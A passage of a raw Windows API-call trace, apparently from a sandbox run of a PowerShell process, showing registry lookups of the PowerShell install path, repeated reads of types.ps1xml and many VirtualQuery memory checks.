ulOptions=0x0, samDesired=0x20019, phkResult=0xcd328 | out: phkResult=0xcd328*=0x330) returned 0x0 [0134.305] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd2ac, lpData=0x0, lpcbData=0xcd2a8*=0x0 | out: lpType=0xcd2ac*=0x1, lpData=0x0, lpcbData=0xcd2a8*=0x56) returned 0x0 [0134.305] CoTaskMemAlloc (cb=0x5a) returned 0x1bd890 [0134.305] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd27c, lpData=0x1bd890, lpcbData=0xcd278*=0x56 | out: lpType=0xcd27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd278*=0x56) returned 0x0 [0134.306] CoTaskMemFree (pv=0x1bd890) [0134.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.306] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: 
lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0134.382] GetSystemInfo (in: lpSystemInfo=0xcbf60 | out: lpSystemInfo=0xcbf60*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0134.382] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.415] SetErrorMode (uMode=0x1) returned 0x1 [0134.415] SetErrorMode (uMode=0x1) returned 0x1 [0134.416] GetFileType (hFile=0x330) returned 0x1 [0134.416] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.418] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.418] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.418] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.418] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.419] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.419] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.419] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.419] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, 
lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.420] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.421] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) 
returned 1 [0134.422] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.423] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.424] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.424] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.424] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, 
lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.424] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.425] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.425] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.427] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, 
lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1000, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x1b4, lpOverlapped=0x0) returned 1 [0134.428] ReadFile (in: hFile=0x330, lpBuffer=0x2da1fe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd2c8, lpOverlapped=0x0 | out: lpBuffer=0x2da1fe8*, lpNumberOfBytesRead=0xcd2c8*=0x0, lpOverlapped=0x0) returned 1 [0134.429] CloseHandle (hObject=0x330) returned 1 [0134.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.429] SetErrorMode (uMode=0x1) returned 0x1 [0134.429] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd240 | out: lpFileInformation=0xcd240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe968c5bf, ftCreationTime.dwHighDateTime=0x1c9ea0b, ftLastAccessTime.dwLowDateTime=0xe968c5bf, ftLastAccessTime.dwHighDateTime=0x1c9ea0b, ftLastWriteTime.dwLowDateTime=0xe968c5bf, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0134.429] 
SetErrorMode (uMode=0x1) returned 0x1 [0134.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.429] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd328 | out: phkResult=0xcd328*=0x330) returned 0x0 [0134.429] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd2ac, lpData=0x0, lpcbData=0xcd2a8*=0x0 | out: lpType=0xcd2ac*=0x1, lpData=0x0, lpcbData=0xcd2a8*=0x56) returned 0x0 [0134.429] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a7b0 [0134.429] RegQueryValueExW (in: hKey=0x330, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd27c, lpData=0x1b80a7b0, lpcbData=0xcd278*=0x56 | out: lpType=0xcd27c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd278*=0x56) returned 0x0 [0134.429] CoTaskMemFree (pv=0x1b80a7b0) [0134.430] RegCloseKey (hKey=0x330) returned 0x0 [0134.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xccf70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0134.817] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 
[0134.918] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.921] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.921] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.922] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.922] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.923] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.927] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.937] 
VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.938] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.938] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.939] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.940] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.941] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.942] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.943] 
VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.948] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.952] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.952] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] 
VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.953] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.954] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.954] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.954] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.954] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.955] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.955] 
VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.956] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.958] VirtualQuery (in: lpAddress=0xcc020, lpBuffer=0xccee0, dwLength=0x30 | out: lpBuffer=0xccee0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0134.958] VirtualQuery (in: 